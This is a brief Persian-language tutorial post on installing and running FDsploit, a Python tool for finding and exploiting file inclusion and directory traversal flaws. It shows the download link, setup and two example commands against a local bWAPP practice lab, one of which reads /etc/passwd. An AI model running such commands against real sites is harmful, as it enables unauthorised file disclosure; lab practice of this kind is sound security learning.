ابزار نوشته شده با Python برای اسکن File Inclusion و Directory Traversal fuzzing و enumeration و همچنین exploitation
دانلود آخرین نسخه
کد:
https://codeload.github.com/chrispetrou/FDsploit/zip/master
بعد از باز کردن فایل آرشیو دستور زیر را اجرا کنید وارد شاخه برنامه شوید و دستور زیر را اجرا کنید
pip install -r requirements.txt --upgrade --user
اگر pip را نصب ندارید اول آن را از طریق apt-get نصب کنید !
برای نمایش کامندها از دستور زیر استفاده کنید
کد:
python fdsploit.py -h
پیدا کردن Directory traversal vulnerability
کد:
./fdsploit.py -u 'http://127.0.0.1:8888/test/bWAPP/bWAPP/directory_traversal_2.php?directory=documents' -c 'PHPSESSID=7acf1c5311fee614d0eb40d7f3473087; security_level=0' -d 8
کد:
./fdsploit.py -u 'http://127.0.0.1:8888/test/bWAPP/bWAPP/rlfi.php?language=*&action=go' -c 'PHPSESSID=7acf1c5311fee614d0eb40d7f3473087; security_level=0' -d 7 -k root -p /etc/passwd
نظر